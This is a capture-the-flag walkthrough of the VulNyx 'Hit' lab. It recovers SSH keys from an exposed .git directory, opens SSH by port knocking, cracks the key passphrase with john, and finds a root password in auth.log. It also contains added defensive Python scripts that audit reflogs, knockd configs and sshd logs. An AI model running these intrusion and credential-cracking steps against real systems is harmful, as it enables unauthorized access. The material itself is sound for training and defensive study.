Vulnyx-Hit-Walkthrough
城南花已开 Lv6

Information gathering

Service detection

BASH
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.176 08:00:27:4e:47:9a (Unknown)
192.168.60.254 00:50:56:e4:ae:23 (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.978 seconds (129.42 hosts/sec). 4 responded
export ip=192.168.60.176
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Breaking and entering... into the world of open ports.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.176:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-04 23:06 CST
Initiating ARP Ping Scan at 23:06
Scanning 192.168.60.176 [1 port]
Completed ARP Ping Scan at 23:06, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:06
Completed Parallel DNS resolution of 1 host. at 23:06, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 23:06
Scanning 192.168.60.176 [1 port]
Discovered open port 80/tcp on 192.168.60.176
Completed SYN Stealth Scan at 23:06, 0.04s elapsed (1 total ports)
Nmap scan report for 192.168.60.176
Host is up, received arp-response (0.00033s latency).
Scanned at 2025-02-04 23:06:13 CST for 0s

PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:4E:47:9A (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

Unusually, this target does not even have port 22 open.

No matter; let's first see what information is there.

BASH
❯ whatweb -v $ip
WhatWeb report for http://192.168.60.176
Status : 200 OK
Title : <None>
IP : 192.168.60.176
Country : RESERVED, ZZ

Summary : HTTPServer[nginx/1.22.1], nginx[1.22.1]

Detected Plugins:
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.

String : nginx/1.22.1 (from server string)

[ nginx ]
Nginx (Engine-X) is a free, open-source, high-performance
HTTP server and reverse proxy, as well as an IMAP/POP3
proxy server.

Version : 1.22.1
Website : http://nginx.net/

HTTP Headers:
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Tue, 04 Feb 2025 15:26:36 GMT
Content-Type: text/html
Last-Modified: Mon, 03 Feb 2025 08:36:13 GMT
Transfer-Encoding: chunked
Connection: close
ETag: W/"67a07ffd-ba"
Content-Encoding: gzip

.git directory leak

A quick directory scan reveals git repository metadata.

BASH
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt,md -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.176
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: md,php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.git (Status: 301) [Size: 169] [--> http://192.168.60.176/.git/]
/.git/HEAD (Status: 200) [Size: 23]
/.git/config (Status: 200) [Size: 92]
/.git/index (Status: 200) [Size: 65]
/.git/logs/ (Status: 200) [Size: 374]
/index.html (Status: 200) [Size: 186]
/index.html (Status: 200) [Size: 186]
Progress: 28404 / 28410 (99.98%)
===============================================================
Finished
===============================================================

Found the logs; let's look at which commits were made.

They reveal the username charlie and a domain name.

So a lot of information can be obtained from the .git directory.

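What the exposed reflog gives away, shown by an added example that is not part of the original write-up: a parser for .git/logs/HEAD that extracts committer identities (the user and mail domain mentioned above) and the commit chain, each commit being a place where a later-deleted secret still lives. The sample reflog is constructed; its object ids are the ones GitHacker downloads below, while the identity and timestamps are made up.

```python
"""Parse a git reflog (.git/logs/HEAD) to see what an exposed .git directory gives
away: committer identities (user name and mail domain) and the commit chain."""
from __future__ import annotations

import re
from dataclasses import dataclass

# One reflog line: <old sha> <new sha> <name> <<email>> <unix time> <tz>\t<action>: <message>
REFLOG_RE = re.compile(
    r"^(?P<old>[0-9a-f]{40}) (?P<new>[0-9a-f]{40}) "
    r"(?P<name>.*?) <(?P<email>[^>]*)> (?P<ts>\d+) (?P<tz>[+-]\d{4})\t"
    r"(?P<action>[^:]+): (?P<msg>.*)$"
)


@dataclass
class ReflogEntry:
    old: str
    new: str
    name: str
    email: str
    ts: int
    action: str
    msg: str


def parse_reflog(text: str) -> list[ReflogEntry]:
    """Return the entries of a reflog file; lines that do not match the format are skipped."""
    entries = []
    for line in text.splitlines():
        m = REFLOG_RE.match(line)
        if m:
            entries.append(ReflogEntry(m["old"], m["new"], m["name"], m["email"],
                                       int(m["ts"]), m["action"], m["msg"]))
    return entries


def identities(entries: list[ReflogEntry]) -> list[tuple[str, str]]:
    """Distinct (local part, domain) pairs taken from committer e-mail addresses."""
    seen = {tuple(e.email.rsplit("@", 1)) for e in entries if "@" in e.email}
    return sorted(seen)


def commit_chain(entries: list[ReflogEntry]) -> list[tuple[str, str]]:
    """Abbreviated hash and message of every commit in the reflog. A file deleted in a
    later commit is still reachable from the earlier ones, so each is a place a secret
    may survive until history is rewritten."""
    return [(e.new[:7], e.msg) for e in entries if e.action.startswith("commit")]


ZERO = "0" * 40
# Constructed sample: the object ids are the ones GitHacker downloads below; the
# identity and the timestamps are made up for this example.
SAMPLE_REFLOG = "\n".join([
    ZERO + " 9ca5eedec55e3c900f8685460aa4ce605f3d8472 charlie <charlie@hit.nyx> 1738571773 +0100\tcommit (initial): Commit #1",
    "9ca5eedec55e3c900f8685460aa4ce605f3d8472 0cf5be47bae50c4aac01531288e7f71ba4be167c charlie <charlie@hit.nyx> 1738571800 +0100\tcommit: Commit #2",
    "0cf5be47bae50c4aac01531288e7f71ba4be167c a9980936fd3d509433e9862e9021aa5fb13351ac charlie <charlie@hit.nyx> 1738571830 +0100\tcommit: Commit #3",
    "a9980936fd3d509433e9862e9021aa5fb13351ac 7dff168ec5d2174eae9a7ff7f4d1d87080a6c726 charlie <charlie@hit.nyx> 1738571860 +0100\tcommit: Commit #4",
    "7dff168ec5d2174eae9a7ff7f4d1d87080a6c726 2b5a7479c36d425981b95982c37b10a34ce11aca charlie <charlie@hit.nyx> 1738571890 +0100\tcommit: Commit #5",
    "2b5a7479c36d425981b95982c37b10a34ce11aca 9ca5eedec55e3c900f8685460aa4ce605f3d8472 charlie <charlie@hit.nyx> 1738712280 +0100\treset: moving to 9ca5eed",
])

if __name__ == "__main__":
    entries = parse_reflog(SAMPLE_REFLOG)
    print("identities:", identities(entries))
    for short, msg in commit_chain(entries):
        print(short, msg)
```
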
WangYihang/GitHacker: 🕷️ A .git folder exploiting tool that is able to restore the entire Git repository, including stash, common branches and common tags.

Use GitHacker to retrieve the .git folder.

BASH
❯ githacker --url http://$ip/.git/ --output-folder result
2025-02-04 23:37:49 INFO 1 urls to be exploited
2025-02-04 23:37:49 INFO Exploiting http://192.168.60.176/.git/ into result/7939591a82ab91ad03925b82d15cfa17
2025-02-04 23:37:49 WARNING Trying to detect encoding from a tiny portion of (23) byte(s).
2025-02-04 23:37:49 INFO ascii passed initial chaos probing. Mean measured chaos is 0.000000 %
2025-02-04 23:37:49 INFO ascii should target any language(s) of ['Latin Based']
2025-02-04 23:37:49 INFO ascii is most likely the one. Stopping the process.
2025-02-04 23:37:49 INFO ascii passed initial chaos probing. Mean measured chaos is 0.000000 %
2025-02-04 23:37:49 INFO ascii should target any language(s) of ['Latin Based']
2025-02-04 23:37:49 INFO We detected language [('Dutch', 0.9375), ('French', 0.875), ('English', 0.8125)] using ascii
2025-02-04 23:37:49 INFO ascii is most likely the one. Stopping the process.
2025-02-04 23:37:49 INFO Directory listing enable under: apache
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/commit-msg.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/applypatch-msg.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/applypatch-msg.sample
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/commit-msg.sample
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/fsmonitor-watchman.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/fsmonitor-watchman.sample
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/post-update.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/post-update.sample
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/pre-applypatch.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/pre-applypatch.sample
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/pre-commit.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/pre-commit.sample
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/pre-merge-commit.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/pre-merge-commit.sample
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/pre-rebase.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/pre-push.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/pre-rebase.sample
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/pre-push.sample
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/pre-receive.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/pre-receive.sample
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/prepare-commit-msg.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/prepare-commit-msg.sample
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/push-to-checkout.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/push-to-checkout.sample
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/hooks/update.sample is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/hooks/update.sample
2025-02-04 23:37:49 INFO [240 bytes] 200 .git/info/exclude
2025-02-04 23:37:49 INFO [725 bytes] 200 .git/logs/HEAD
2025-02-04 23:37:49 INFO [725 bytes] 200 .git/logs/refs/heads/master
2025-02-04 23:37:49 INFO [148 bytes] 200 .git/objects/0c/f5be47bae50c4aac01531288e7f71ba4be167c
2025-02-04 23:37:49 INFO [149 bytes] 200 .git/objects/2b/5a7479c36d425981b95982c37b10a34ce11aca
2025-02-04 23:37:49 INFO [149 bytes] 200 .git/objects/30/36160351b1d7eda360bdd3fb8e65d535ad6df1
2025-02-04 23:37:49 INFO [15 bytes] 200 .git/objects/4b/825dc642cb6eb9a060e54bf8d69288fbee4904
2025-02-04 23:37:49 INFO [252 bytes] 200 .git/objects/5c/e5fff468df4e331e05d1f665faffb29632ff42
2025-02-04 23:37:49 INFO [1359 bytes] 200 .git/objects/73/9ad589e33f1e90bd2f1929c82f1037dfc73b09
2025-02-04 23:37:49 INFO [86 bytes] 200 .git/objects/7c/3df59ddda406f09e4e4d36ddbd9d1daf67fda3
2025-02-04 23:37:49 INFO [1981 bytes] 200 .git/objects/7d/19f826926c775d465df62b5f82f66ec9fb7fa1
2025-02-04 23:37:49 ERROR FileExistsError(17, 'File exists')
2025-02-04 23:37:49 INFO [150 bytes] 200 .git/objects/7d/ff168ec5d2174eae9a7ff7f4d1d87080a6c726
2025-02-04 23:37:49 INFO [253 bytes] 200 .git/objects/94/9429787b70fbcfc3816c0ba158ee2c83bb9f66
2025-02-04 23:37:49 INFO [86 bytes] 200 .git/objects/99/dd10f9077a951497d8a76305a3c4e26adb31ff
2025-02-04 23:37:49 INFO [121 bytes] 200 .git/objects/9c/a5eedec55e3c900f8685460aa4ce605f3d8472
2025-02-04 23:37:49 INFO [86 bytes] 200 .git/objects/a7/685af0a6c8f0ecae7cd44159f3a6ceab3625d7
2025-02-04 23:37:49 INFO [149 bytes] 200 .git/objects/a9/980936fd3d509433e9862e9021aa5fb13351ac
2025-02-04 23:37:49 ERROR FileExistsError(17, 'File exists')
2025-02-04 23:37:49 INFO [1982 bytes] 200 .git/objects/a9/d7d7d4c39d4335d1529d5f78dd621695761b5a
2025-02-04 23:37:49 ERROR FileExistsError(17, 'File exists')
2025-02-04 23:37:49 ERROR FileExistsError(17, 'File exists')
2025-02-04 23:37:49 INFO [41 bytes] 200 .git/refs/heads/master
2025-02-04 23:37:49 INFO [10 bytes] 200 .git/COMMIT_EDITMSG
2025-02-04 23:37:49 INFO [23 bytes] 200 .git/HEAD
2025-02-04 23:37:49 ERROR /tmp/tmp1xu5p4po/.git/config is potential dangerous, skip downloading this file
2025-02-04 23:37:49 ERROR [-1 bytes] -1 .git/config
2025-02-04 23:37:49 ERROR FileExistsError(17, 'File exists')
2025-02-04 23:37:49 ERROR FileExistsError(17, 'File exists')
2025-02-04 23:37:49 INFO [73 bytes] 200 .git/description
2025-02-04 23:37:49 INFO [65 bytes] 200 .git/index
2025-02-04 23:37:49 INFO Cloning downloaded repo from /tmp/tmp1xu5p4po to result/7939591a82ab91ad03925b82d15cfa17
2025-02-04 23:37:49 ERROR Cloning into 'result/7939591a82ab91ad03925b82d15cfa17'...
done.
2025-02-04 23:37:49 INFO Check it out: result/7939591a82ab91ad03925b82d15cfa17
2025-02-04 23:37:49 INFO 1 / 1 were exploited successfully
2025-02-04 23:37:49 INFO http://192.168.60.176/.git/ -> result/7939591a82ab91ad03925b82d15cfa17
cd result
ls -al
total 12
drwxr-xr-x 3 Pepster Pepster 4096 Feb 4 23:37 .
drwxr-xr-x 10 Pepster Pepster 4096 Feb 4 23:37 ..
drwxr-xr-x 3 Pepster Pepster 4096 Feb 4 23:37 7939591a82ab91ad03925b82d15cfa17
cd 7939591a82ab91ad03925b82d15cfa17
ls -al
total 12
drwxr-xr-x 3 Pepster Pepster 4096 Feb 4 23:37 .
drwxr-xr-x 3 Pepster Pepster 4096 Feb 4 23:37 ..
drwxr-xr-x 8 Pepster Pepster 4096 Feb 4 23:38 .git
❯ git reflog
9ca5eed (HEAD -> master) HEAD@{0}: reset: moving to 9ca5eed
2b5a747 (origin/master, origin/HEAD, ls) HEAD@{1}: reset: moving to 2b5a
2b5a747 (origin/master, origin/HEAD, ls) HEAD@{2}: reset: moving to HEAD
2b5a747 (origin/master, origin/HEAD, ls) HEAD@{3}: commit: Commit #5
7dff168 HEAD@{4}: commit: Commit #4
a998093 HEAD@{5}: commit: Commit #3
0cf5be4 HEAD@{6}: commit: Commit #2
9ca5eed (HEAD -> master) HEAD@{7}: commit (initial): Commit #1
❯ git reset --hard 9ca5eed
HEAD is now at 9ca5eed Commit #1
ls
id_rsa knockd.conf
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----

The first commit yields a private key file, but the problem is that this target does not have port 22 open at all, so there is no way to log in over SSH.

Besides the private key there is also a configuration file, knockd.conf.

BASH
cat knockd.conf
[options]
UseSyslog

[openSSH]
sequence = 7000,8000,9000
seq_timeout = 5
command = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn

[closeSSH]
sequence = 9000,8000,7000
seq_timeout = 5
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn

[openHTTPS]
sequence = 12345,54321,24680,13579
seq_timeout = 5
command = /usr/local/sbin/knock_add -i -c INPUT -p tcp -d 443 -f %IP%
tcpflags = syn

After asking GPT, it turns out to be a port-knocking configuration: once the ports receive requests in the given order, the operation in command is executed, such as adding a firewall rule or opening HTTPS.

Then, in commit a998093, a new private key file and a new knockd.conf configuration were found.

BASH
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,3E2B3558346EF63A
...
-----END RSA PRIVATE KEY-----
cat knockd.conf
[options]
LogFile = /var/log/knockd.log

[openSSH]
sequence = 65535,8888,54111
seq_timeout = 1
command = /usr/sbin/service ssh start
tcpflags = syn
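
Both knockd.conf files above, audited by an added example that is not part of the original write-up. The point it surfaces: the first config scopes its iptables rule to the knocker with %IP% and has a matching closeSSH rule, while the second runs service ssh start, which brings sshd up for every source and is never undone, so one knock leaves port 22 open to everyone.

```python
"""Audit a knockd.conf: list each knock rule and flag configurations that are
weaker than they look (the two configs from the write-up are embedded as samples)."""
from __future__ import annotations

import configparser

MIN_SEQUENCE_PORTS = 4  # policy choice for this example: shorter sequences are easier to hit by chance


def parse_knockd(text: str) -> dict:
    """Return {section: {sequence, seq_timeout, command, tcpflags}} for every rule section."""
    cp = configparser.ConfigParser(allow_no_value=True, interpolation=None)
    cp.optionxform = str  # keep keys as written (UseSyslog, seq_timeout, ...)
    cp.read_string(text)
    rules = {}
    for section in cp.sections():
        if section == "options":
            continue
        sec = cp[section]
        rules[section] = {
            "sequence": [int(p) for p in sec.get("sequence", "").split(",") if p.strip()],
            "seq_timeout": int(sec.get("seq_timeout", "0")),
            "command": sec.get("command", ""),
            "tcpflags": sec.get("tcpflags", ""),
        }
    return rules


def audit(rules: dict) -> list[tuple[str, str]]:
    """Findings as (section, code) pairs, in config order."""
    findings = []
    for name, r in rules.items():
        if "%IP%" not in r["command"]:
            # e.g. "service ssh start": the state change applies to every source, not just the knocker
            findings.append((name, "NO_IP_SCOPE"))
        if len(r["sequence"]) < MIN_SEQUENCE_PORTS:
            findings.append((name, "SHORT_SEQUENCE"))
        if name.startswith("open") and "close" + name[4:] not in rules:
            # nothing ever reverts the open command, so a single knock opens the service for good
            findings.append((name, "NO_CLOSE_RULE"))
    return findings


# The first knockd.conf from the write-up (iptables rules scoped to %IP%).
KNOCKD_IPTABLES = """\
[options]
UseSyslog

[openSSH]
sequence = 7000,8000,9000
seq_timeout = 5
command = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn

[closeSSH]
sequence = 9000,8000,7000
seq_timeout = 5
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn

[openHTTPS]
sequence = 12345,54321,24680,13579
seq_timeout = 5
command = /usr/local/sbin/knock_add -i -c INPUT -p tcp -d 443 -f %IP%
tcpflags = syn
"""

# The second knockd.conf from the write-up (starts the whole sshd service).
KNOCKD_SERVICE = """\
[options]
LogFile = /var/log/knockd.log

[openSSH]
sequence = 65535,8888,54111
seq_timeout = 1
command = /usr/sbin/service ssh start
tcpflags = syn
"""

if __name__ == "__main__":
    for label, conf in (("iptables config", KNOCKD_IPTABLES), ("service config", KNOCKD_SERVICE)):
        rules = parse_knockd(conf)
        print(label, {k: v["sequence"] for k, v in rules.items()})
        for section, code in audit(rules):
            print("  ", section, code)
```
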

Let's first try the requests that may start the SSH service.

I use nmap to scan the ports of the sequence in turn.

This triggered the corresponding request that starts the SSH service.

BASH
❯ nmap -p 65535,8888,54111 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-04 23:57 CST
Nmap scan report for hit.nyx (192.168.60.176)
Host is up (0.00075s latency).

PORT STATE SERVICE
8888/tcp closed sun-answerbook
54111/tcp closed unknown
65535/tcp closed unknown
MAC Address: 08:00:27:4E:47:9A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.176:22
Open 192.168.60.176:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-04 23:57 CST
Initiating ARP Ping Scan at 23:57
Scanning 192.168.60.176 [1 port]
Completed ARP Ping Scan at 23:57, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 23:57
Scanning hit.nyx (192.168.60.176) [2 ports]
Discovered open port 22/tcp on 192.168.60.176
Discovered open port 80/tcp on 192.168.60.176
Completed SYN Stealth Scan at 23:57, 0.04s elapsed (2 total ports)
Nmap scan report for hit.nyx (192.168.60.176)
Host is up, received arp-response (0.00064s latency).
Scanned at 2025-02-04 23:57:28 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:4E:47:9A (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Try logging in with the id_rsa from commit a998093.

The private key turns out to be encrypted.

Brute-force it.

User privilege escalation

Login successful.

BASH
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
charlie1 (id_rsa)
1g 0:00:00:00 DONE (2025-02-05 00:00) 14.28g/s 10057p/s 10057c/s 10057C/s batista..nichole
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ ssh charlie@$ip -i id_rsa
Enter passphrase for key 'id_rsa':
charlie@hit:~$ cat user.txt
21744d4a65af82ac691cb3381c033d37

Root privilege escalation

Gather information again.

The user turns out to be a member of the adm group.

That allows reading logs and related information.

charlie@hit:~$ id
uid=1000(charlie) gid=1000(charlie) grupos=1000(charlie),4(adm)

The target has neither wget nor curl; a really clean box.

Fortunately, busybox is available.

I uploaded linpeas, but it found nothing, so the logs are the only thing left to dig into.

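The auth.log lines are the interesting part of the grep output below. This added example (not from the original write-up) parses sshd events the way any adm-group member can read them, summarising accepted logins and flagging "invalid user" names that look like a credential typed into the login prompt, which is how a secret ends up in a log readable by non-root users. The sample is constructed from the write-up's own auth.log lines plus one made-up admin line.

```python
"""Scan sshd entries in auth.log: summarise accepted logins and flag 'invalid user'
names that look like a password rather than a user name."""
from __future__ import annotations

import re
from collections import Counter

# Accepted/Failed sshd lines in the rsyslog high-precision timestamp format used in the write-up.
SSHD_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) sshd\[(?P<pid>\d+)\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?P<invalid>invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port (?P<port>\d+) ssh2$"
)


def parse_sshd(text: str) -> list[dict]:
    """Return one dict per Accepted/Failed line; pam and other lines are ignored."""
    events = []
    for line in text.splitlines():
        m = SSHD_RE.match(line)
        if m:
            d = m.groupdict()
            d["invalid"] = d["invalid"] is not None
            events.append(d)
    return events


def accepted_logins(events: list[dict]) -> list[tuple[str, str]]:
    """Distinct (user, source) pairs that authenticated successfully."""
    return sorted({(e["user"], e["src"]) for e in events if e["result"] == "Accepted"})


def looks_like_secret(name: str) -> bool:
    """Heuristic: 8+ characters drawn from at least three character classes is more
    likely a password than a user name (user1234 has only two classes and is not flagged)."""
    classes = sum([
        any(c.islower() for c in name),
        any(c.isupper() for c in name),
        any(c.isdigit() for c in name),
        any(not c.isalnum() for c in name),
    ])
    return len(name) >= 8 and classes >= 3


def leaked_credentials(events: list[dict]) -> list[tuple[str, int]]:
    """Invalid-user names that look like secrets, with how often each was tried."""
    names = Counter(e["user"] for e in events if e["invalid"] and looks_like_secret(e["user"]))
    return sorted(names.items())


# Constructed sample: the write-up's auth.log lines plus one made-up 'admin' attempt.
SAMPLE_AUTH = """\
2025-02-03T09:49:56.742982+01:00 hit sshd[665]: Accepted password for charlie from 192.168.1.10 port 46372 ssh2
2025-02-03T09:50:23.932694+01:00 hit sshd[691]: Accepted password for root from 192.168.1.10 port 51268 ssh2
2025-02-03T09:50:54.780164+01:00 hit sshd[701]: pam_unix(sshd:auth): check pass; user unknown
2025-02-03T09:50:56.693974+01:00 hit sshd[701]: Failed password for invalid user r00tP4zzw0rd from 192.168.1.10 port 45796 ssh2
2025-02-03T09:51:01.010590+01:00 hit sshd[701]: Failed password for invalid user r00tP4zzw0rd from 192.168.1.10 port 45796 ssh2
2025-02-03T09:51:04.978253+01:00 hit sshd[701]: Failed password for invalid user r00tP4zzw0rd from 192.168.1.10 port 45796 ssh2
2025-02-03T09:51:26.125143+01:00 hit sshd[712]: Accepted password for root from 192.168.1.10 port 39662 ssh2
2025-02-03T09:55:00.000000+01:00 hit sshd[740]: Failed password for invalid user admin from 192.168.1.77 port 40000 ssh2
"""

if __name__ == "__main__":
    events = parse_sshd(SAMPLE_AUTH)
    print("accepted:", accepted_logins(events))
    print("invalid-user names that look like credentials:", leaked_credentials(events))
```

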
BASH
charlie@hit:/var/log$ grep -Pinr "pass" . |grep -v "access.log"
./auth.log:2:2025-02-03T09:49:56.742982+01:00 hit sshd[665]: Accepted password for charlie from 192.168.1.10 port 46372 ssh2
./auth.log:14:2025-02-03T09:50:23.932694+01:00 hit sshd[691]: Accepted password for root from 192.168.1.10 port 51268 ssh2
./auth.log:24:2025-02-03T09:50:54.780164+01:00 hit sshd[701]: pam_unix(sshd:auth): check pass; user unknown
./auth.log:26:2025-02-03T09:50:56.693974+01:00 hit sshd[701]: Failed password for invalid user r00tP4zzw0rd from 192.168.1.10 port 45796 ssh2
./auth.log:27:2025-02-03T09:50:59.412534+01:00 hit sshd[701]: pam_unix(sshd:auth): check pass; user unknown
./auth.log:28:2025-02-03T09:51:01.010590+01:00 hit sshd[701]: Failed password for invalid user r00tP4zzw0rd from 192.168.1.10 port 45796 ssh2
./auth.log:31:2025-02-03T09:51:03.164492+01:00 hit sshd[701]: pam_unix(sshd:auth): check pass; user unknown
./auth.log:32:2025-02-03T09:51:04.978253+01:00 hit sshd[701]: Failed password for invalid user r00tP4zzw0rd from 192.168.1.10 port 45796 ssh2
./auth.log:35:2025-02-03T09:51:26.125143+01:00 hit sshd[712]: Accepted password for root from 192.168.1.10 port 39662 ssh2
./auth.log:46:2025-02-03T09:52:38.094768+01:00 hit sshd[729]: Accepted password for charlie from 192.168.1.10 port 37192 ssh2
./kern.log:82:2025-02-03T09:45:46.607149+01:00 hit kernel: [ 0.005276] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:119:2025-02-03T09:45:46.607203+01:00 hit kernel: [ 0.022514] Speculative Store Bypass: Vulnerable
./kern.log:297:2025-02-03T09:45:46.607334+01:00 hit kernel: [ 0.370923] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:331:2025-02-03T09:45:46.607354+01:00 hit kernel: [ 0.396807] ima: No TPM chip found, activating TPM-bypass!
./kern.log:350:2025-02-03T09:45:46.607417+01:00 hit kernel: [ 0.489648] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:470:2025-02-03T09:45:46.607532+01:00 hit kernel: [ 2.420236] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:571:2025-02-03T09:46:09.599307+01:00 hit kernel: [ 0.005428] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
